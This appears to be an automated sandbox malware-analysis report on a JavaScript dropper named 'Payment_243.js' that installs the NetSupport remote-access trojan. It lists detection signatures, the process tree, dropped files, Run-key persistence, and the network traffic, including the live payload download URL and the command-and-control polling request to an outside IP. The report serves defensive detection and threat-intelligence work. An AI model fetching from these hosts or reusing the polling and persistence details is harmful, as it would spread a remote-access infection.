Windows Analysis Report
Payment_243.js

Overview

General Information

Sample name: Payment_243.js
Analysis ID: 1591023
MD5: 19cef6a2f4055703922f3e8fd2c92fb9
SHA1: e6ccef88b3cbba0424a39edab01697716fd8d813
SHA256: d0480e3927154036684ba2a60dba9576234bae2aa484294c3d925923de55196f

Detection

NetSupport RAT
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Benign windows process drops PE files
Multi AV Scanner detection for dropped file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Contains functionality to detect sleep reduction / modifications
Contains functionalty to change the wallpaper
Delayed program exit found
Deletes itself after installation
JavaScript source code contains functionality to generate code involving HTTP requests or file downloads
JavaScript source code contains functionality to generate code involving a shell, file or stream
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: WScript or CScript Dropper
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables security privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evaded block containing many API calls
Found evasive API chain (date check)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
PE file does not import any functions
Potential key logger detected (key state polling based)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: DNS Query To Remote Access Software Domain From Non-Browser App
Sigma detected: Script Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Tries to disable installed Antivirus / HIPS / PFW
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the system / local time for branch decision (may execute only at specific dates)
Yara detected Keylogger Generic
Yara detected NetSupport remote tool

Classification

  • System is w7x64
  • wscript.exe (PID: 3592 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Payment_243.js" MD5: 045451FA238A75305CC26AC982472367)
    • client32.exe (PID: 3968 cmdline: "C:\ProgramData\i99ekubc\client32.exe" MD5: C4F1B50E3111D29774F7525039FF7086)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
C:\ProgramData\i99ekubc\PCICHEK.DLL | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |
C:\ProgramData\i99ekubc\pcicapi.dll | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |
C:\ProgramData\i99ekubc\client32.exe | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |
C:\ProgramData\i99ekubc\TCCTL32.DLL | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |
C:\ProgramData\i99ekubc\HTCTL32.DLL | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |

Source | Rule | Description | Author | Strings
00000004.00000002.644024735.0000000000A12000.00000002.00000001.01000000.00000008.sdmp | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |
00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmp | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security |
00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmp | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |
00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmp | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |
00000004.00000002.644043633.0000000001F93000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |

Source | Rule | Description | Author | Strings
4.2.client32.exe.72b40000.5.unpack | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |
4.2.client32.exe.73620000.6.unpack | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |
4.2.client32.exe.a10000.0.unpack | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |
4.0.client32.exe.a10000.0.unpack | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |
4.2.client32.exe.111b8c68.2.raw.unpack | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security |

System Summary

Source: Network Connection | Author: frack113, Florian Roth | Data: DestinationIp: 45.155.249.215, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 3592, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49163
Source: Process started | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community | Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Payment_243.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Payment_243.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1244, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Payment_243.js", ProcessId: 3592, ProcessName: wscript.exe
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: C:\ProgramData\i99ekubc\client32.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\wscript.exe, ProcessId: 3592, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\(Default)
Source: DNS query | Author: frack113, Connor Martin | Data: Image: C:\ProgramData\i99ekubc\client32.exe, QueryName: geo.netsupportsoftware.com
Source: Network Connection | Author: frack113 | Data: DestinationIp: 45.155.249.215, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 3592, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49163
Source: Process started | Author: Michael Haag | Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Payment_243.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Payment_243.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1244, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Payment_243.js", ProcessId: 3592, ProcessName: wscript.exe
Source: Registry Key set | Author: frack113 | Data: EventID: 13, EventType: SetValue, Image: C:\Windows\System32\wscript.exe, ProcessId: 3592, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-14T16:25:36.126119+0100 | 1810004 | 1 | Potentially Bad Traffic | 192.168.2.22 | 49163 | 45.155.249.215 | 80 | TCP

AV Detection

Source: C:\ProgramData\i99ekubc\HTCTL32.DLL | ReversingLabs: Detection: 15%
Source: C:\ProgramData\i99ekubc\PCICHEK.DLL | ReversingLabs: Detection: 18%
Source: C:\ProgramData\i99ekubc\PCICL32.DLL | ReversingLabs: Detection: 18%
Source: C:\ProgramData\i99ekubc\client32.exe | ReversingLabs: Detection: 31%
Source: C:\ProgramData\i99ekubc\pcicapi.dll | ReversingLabs: Detection: 15%
Source: C:\ProgramData\i99ekubc\remcmdstub.exe | ReversingLabs: Detection: 28%
Source: C:\ProgramData\i99ekubc\client32.exe | Code function: 4_2_110ADA40 GetModuleHandleA,GetProcAddress,GetProcAddress,GetLastError,wsprintfA,GetLastError,_memset,CryptGetProvParam,CryptGetProvParam,GetLastError,_memset,CryptGetProvParam,GetLastError,GetLastError,GetLastError,GetLastError,_malloc,GetLastError,_free,GetLastError,CryptReleaseContext,SetLastError,FreeLibrary,4_2_110ADA40
Source: C:\Windows\System32\wscript.exe | File opened: C:\PROGRA~3\i99ekubc\msvcr100.dll
Source: Binary string: msvcr100.i386.pdb source: client32.exe, 00000004.00000002.644430314.0000000069DB1000.00000020.00000001.01000000.0000000B.sdmp
Source: Binary string: E:\nsmsrc\nsm\1210\1210f\client32\Release\PCICL32.pdb source: client32.exe, 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmp, PCICL32.DLL.0.dr
Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdbL source: client32.exe, 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmp, HTCTL32.DLL.0.dr
Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\Full\pcichek.pdb source: client32.exe, 00000004.00000002.644485160.0000000073622000.00000002.00000001.01000000.0000000A.sdmp
Source: Binary string: E:\nsmsrc\nsm\1200\1200\client32\Release\client32.pdb source: client32.exe, 00000004.00000002.644024735.0000000000A12000.00000002.00000001.01000000.00000008.sdmp, client32.exe, 00000004.00000000.506306260.0000000000A12000.00000002.00000001.01000000.00000008.sdmp, client32.exe.0.dr
Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdb source: client32.exe, 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmp, HTCTL32.DLL.0.dr
Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Release\pcicapi.pdb source: client32.exe, 00000004.00000002.644466466.0000000072B45000.00000002.00000001.01000000.0000000C.sdmp, pcicapi.dll.0.dr
Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: api-ms-win-core-localization-l1-2-0.dll.0.dr
Source: C:\ProgramData\i99ekubc\client32.exe | Code function: 4_2_111273E0 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,4_2_111273E0
Source: C:\ProgramData\i99ekubc\client32.exe | Code function: 4_2_1102D9F4 Sleep,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,4_2_1102D9F4
Source: C:\ProgramData\i99ekubc\client32.exe | Code function: 4_2_1102DD21 CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,4_2_1102DD21
Source: C:\ProgramData\i99ekubc\client32.exe | Code function: 4_2_1110BD70 _memset,wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose,4_2_1110BD70
Source: C:\ProgramData\i99ekubc\client32.exe | Code function: 4_2_110663B0 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,4_2_110663B0
Source: C:\ProgramData\i99ekubc\client32.exe | Code function: 4_2_1106ABD0 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError,4_2_1106ABD0
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\desktop.ini

Software Vulnerabilities

Source: Payment_243.js | Argument value: ['"WScript.Shell"']
Source: Payment_243.js | Argument value: ['"Shell.Application"', '"WScript.Shell"']
Source: Payment_243.js | Argument value: ['"Shell.Application"', '"WScript.Shell"', '"Scripting.FileSystemObject"']

Networking

Source: Network traffic | Suricata IDS: 1810004 - Severity 1 - Joe Security ANOMALY Microsoft Office HTTP activity : 192.168.2.22:49163 -> 45.155.249.215:80
Source: C:\Windows\System32\wscript.exe | Network Connect: 45.155.249.215 80
Source: Payment_243.js | Argument value: ['"GET","http://45.155.249.215/xxx.zip?mt=6364",false']
Source: Payment_243.js | Argument value: ['"MSXML2.XMLHTTP"']
Source: global traffic | HTTP traffic detected: GET /location/loca.asp HTTP/1.1 | Host: geo.netsupportsoftware.com | Connection: Keep-Alive | Cache-Control: no-cache
Source: Joe Sandbox View | IP Address: 172.67.68.212
Source: Joe Sandbox View | ASN Name: MEER-ASmeerfarbigGmbHCoKGDE
Source: global traffic | HTTP traffic detected: GET /xxx.zip?mt=6364 HTTP/1.1 | Accept: */* | UA-CPU: AMD64 | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: 45.155.249.215 | Connection: Keep-Alive
Source: unknown | TCP traffic detected without corresponding DNS query: 45.155.249.215
Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK | Server: nginx/1.24.0 (Ubuntu) | Date: Tue, 14 Jan 2025 15:25:36 GMT | Content-Type: application/zip | Content-Length: 2845498 | Connection: keep-alive | Last-Modified: Mon, 13 Jan 2025 16:08:22 GMT | ETag: "2b6b3a-62b98a754cee9" | Accept-Ranges: bytes
Source: C:\Windows\System32\wscript.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\xxx[1].zip
Source: global traffic | DNS traffic detected: DNS query: geo.netsupportsoftware.com
Source: unknown | HTTP traffic detected: POST http://185.157.213.71/fakeurl.htm HTTP/1.1 | User-Agent: NetSupport Manager/1.3 | Content-Type: application/x-www-form-urlencoded | Content-Length: 22 | Host: 185.157.213.71 | Connection: Keep-Alive | CMD=POLL | INFO=1 | ACK=1
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Tue, 14 Jan 2025 15:25:50 GMT | Content-Type: text/html; charset=us-ascii | Transfer-Encoding: chunked | Connection: keep-alive | CF-Ray: 901ea414fa9c41de-EWR | CF-Cache-Status: DYNAMIC | cf-apo-via: origin,host | Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=i1a0Dx0OGKXHyff4tWOx9huhmxu%2FrfpGODYCY3eCxDk%2BoYOYnaiuMoMz%2Felupk%2BTzjfpiLGxRUjNSSN2%2FaPZ1njy6u0TbmV5Jr%2BA1HNDIEKeTAseAOqNo1O6%2BgdO6dLvCRsR6g%2Fy2fdL0D0%2B"}],"group":"cf-nel","max_age":604800} | NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} | Server: cloudflare | server-timing: cfL4;desc="?proto=TCP&rtt=1577&min_rtt=1577&rtt_var=788&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=118&delivery_rate=0&cwnd=223&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" | Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>0
                                Source: global traffic
                                HTTP traffic detected:
                                    HTTP/1.1 404 Not Found
                                    Date: Tue, 14 Jan 2025 15:25:51 GMT
                                    Content-Type: text/html; charset=us-ascii
                                    Transfer-Encoding: chunked
                                    Connection: keep-alive
                                    CF-Ray: 901ea419dc7059bb-IAD
                                    CF-Cache-Status: DYNAMIC
                                    cf-apo-via: origin,host
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wSZ%2BRGP%2FBskJ7LnFLn%2BdwOJy8PAomrnw07fCdNdJ0YQbD5EIWgljEF5buCYnwlqPT%2BhhnetsEziM50DbTASpiI6M4oSMzf%2Frv6qXOTbv4t9lpKca36wLWM%2BL6M7ghXFQ93uZQZw11KSih7sn"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    server-timing: cfL4;desc="?proto=TCP&rtt=8053&min_rtt=8053&rtt_var=4026&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=118&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                    Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>0
                                Source: global traffic
                                HTTP traffic detected:
                                    HTTP/1.1 404 Not Found
                                    Date: Tue, 14 Jan 2025 15:25:52 GMT
                                    Content-Type: text/html; charset=us-ascii
                                    Transfer-Encoding: chunked
                                    Connection: keep-alive
                                    CF-Ray: 901ea41e5c173b74-IAD
                                    CF-Cache-Status: DYNAMIC
                                    cf-apo-via: origin,host
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LKEYObFWeGsbhjPcHiwLQ5zFRGBnMAimUDbPlqHud%2F6nLggXW2TDZkaH0QDok7leAQbRybrJDBESoNHc%2BZAPEz9GZdTbMBoHCZ82rfT%2BMeo9JV5oroEorvLVQi948Unz5j7mf%2Bgr4vZZtulj"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    server-timing: cfL4;desc="?proto=TCP&rtt=23406&min_rtt=23406&rtt_var=11703&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=118&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                    Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>0
                                Source: client32.exe, client32.exe, 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmp, HTCTL32.DLL.0.drString found in binary or memory: http://%s/fakeurl.htm
                                Source: client32.exe, client32.exe, 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmp, HTCTL32.DLL.0.drString found in binary or memory: http://%s/testpage.htm
                                Source: client32.exe, 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmp, HTCTL32.DLL.0.drString found in binary or memory: http://%s/testpage.htmwininet.dll
                                Source: Payment_243.jsString found in binary or memory: http://0.30000000000000004.com/
                                Source: client32.exe, client32.exe, 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmp, PCICL32.DLL.0.drString found in binary or memory: http://127.0.0.1
                                Source: client32.exe, 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmp, PCICL32.DLL.0.drString found in binary or memory: http://127.0.0.1RESUMEPRINTING
                                Source: wscript.exe, 00000000.00000003.365672076.0000000004BC0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.366387222.0000000006E2E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.365595144.0000000003050000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.365421348.0000000004420000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.155.249.215/xxx.zip?mt=6364
                                Source: webmvorbisencoder.dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                                Source: webmvorbisencoder.dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
                                Source: client32.exe.0.drString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
                                Source: webmvorbisencoder.dll.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
                                Source: webmvorbisencoder.dll.0.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
                                Source: webmvorbisencoder.dll.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                                Source: webmvorbisencoder.dll.0.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
                                Source: client32.exe, client32.exe, 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmp, client32.exe, 00000004.00000002.643953111.0000000000441000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000004.00000002.643977444.000000000047D000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000004.00000003.509854506.000000000047F000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000004.00000003.509844776.000000000047D000.00000004.00000020.00020000.00000000.sdmp, PCICL32.DLL.0.drString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.asp
                                Source: client32.exe, 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmp, PCICL32.DLL.0.drString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspSetChannel(%s)
                                Source: client32.exe, 00000004.00000002.643953111.0000000000441000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspe
                                Source: webmvorbisencoder.dll.0.drString found in binary or memory: http://ocsp.digicert.com0C
                                Source: webmvorbisencoder.dll.0.drString found in binary or memory: http://ocsp.digicert.com0O
                                Source: client32.exe.0.drString found in binary or memory: http://ocsp.thawte.com0
                                Source: HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, remcmdstub.exe.0.drString found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
                                Source: HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, remcmdstub.exe.0.drString found in binary or memory: http://s2.symcb.com0
                                Source: HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, remcmdstub.exe.0.drString found in binary or memory: http://sv.symcb.com/sv.crl0f
                                Source: HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, remcmdstub.exe.0.drString found in binary or memory: http://sv.symcb.com/sv.crt0
                                Source: HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, remcmdstub.exe.0.drString found in binary or memory: http://sv.symcd.com0&
                                Source: webmvorbisencoder.dll.0.drString found in binary or memory: http://t1.symcb.com/ThawtePCA.crl0
                                Source: webmvorbisencoder.dll.0.drString found in binary or memory: http://t2.symcb.com0
                                Source: webmvorbisencoder.dll.0.drString found in binary or memory: http://tl.symcb.com/tl.crl0
                                Source: webmvorbisencoder.dll.0.drString found in binary or memory: http://tl.symcb.com/tl.crt0
                                Source: webmvorbisencoder.dll.0.drString found in binary or memory: http://tl.symcd.com0&
                                Source: client32.exe.0.drString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
                                Source: client32.exe.0.drString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
                                Source: client32.exe.0.drString found in binary or memory: http://ts-ocsp.ws.symantec.com07
                                Source: Payment_243.jsString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                                Source: webmvorbisencoder.dll.0.drString found in binary or memory: http://www.digicert.com/CPS0
                                Source: client32.exe, 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, PCICL32.DLL.0.drString found in binary or memory: http://www.netsupportschool.com/tutor-assistant.asp
                                Source: client32.exe, 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, PCICL32.DLL.0.drString found in binary or memory: http://www.netsupportschool.com/tutor-assistant.asp11(L
                                Source: client32.exe.0.drString found in binary or memory: http://www.netsupportsoftware.com
                                Source: client32.exe, 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, PCICL32.DLL.0.drString found in binary or memory: http://www.pci.co.uk/support
                                Source: client32.exe, 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, PCICL32.DLL.0.drString found in binary or memory: http://www.pci.co.uk/supportsupport
                                Source: HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, remcmdstub.exe.0.drString found in binary or memory: http://www.symauth.com/cps0(
                                Source: HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, remcmdstub.exe.0.drString found in binary or memory: http://www.symauth.com/rpa00
                                Source: HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, remcmdstub.exe.0.drString found in binary or memory: https://d.symcb.com/cps0%
                                Source: HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, remcmdstub.exe.0.drString found in binary or memory: https://d.symcb.com/rpa0
                                Source: Payment_243.jsString found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/API/CanvasRenderingContext2D/globalCompositeOperation
                                Source: Payment_243.jsString found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/Events/mousewheel)
                                Source: Payment_243.jsString found in binary or memory: https://github.com/apache/echarts/issues/14266
                                Source: Payment_243.jsString found in binary or memory: https://github.com/apache/incubator-echarts/issues/11369
                                Source: Payment_243.jsString found in binary or memory: https://github.com/apache/incubator-echarts/issues/12229
                                Source: Payment_243.jsString found in binary or memory: https://github.com/d3/d3/blob/9cc9a875e636a1dcf36cc1e07bdf77e1ad6e2c74/src/arrays/quantile.js
                                Source: Payment_243.jsString found in binary or memory: https://github.com/d3/d3/blob/b516d77fb8566b576088e73410437494717ada26/src/time/scale.js
                                Source: Payment_243.jsString found in binary or memory: https://github.com/ecomfe/zrender/blob/master/LICENSE.txt
                                Source: Payment_243.jsString found in binary or memory: https://jsbench.me/2vkpcekkvw/1)
                                Source: Payment_243.jsString found in binary or memory: https://momentjs.com/
                                Source: Payment_243.jsString found in binary or memory: https://tc39.github.io/ecma262/#sec-daylight-saving-time-adjustment).
                                Source: webmvorbisencoder.dll.0.drString found in binary or memory: https://www.digicert.com/CPS0
                                Source: webmvorbisencoder.dll.0.drString found in binary or memory: https://www.thawte.com/cps0/
                                Source: webmvorbisencoder.dll.0.drString found in binary or memory: https://www.thawte.com/repository0W
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49164 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49164
                                Source: C:\ProgramData\i99ekubc\client32.exeCode function: 4_2_1101FC20 OpenClipboard,GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,MessageBeep,CloseClipboard,4_2_1101FC20
                                Source: C:\ProgramData\i99ekubc\client32.exeCode function: 4_2_110335A0 GetClipboardFormatNameA,SetClipboardData,4_2_110335A0
                                Source: C:\ProgramData\i99ekubc\client32.exeCode function: 4_2_11033320 IsClipboardFormatAvailable,GetClipboardData,GetClipboardFormatNameA,GetLastError,GlobalUnlock,4_2_11033320
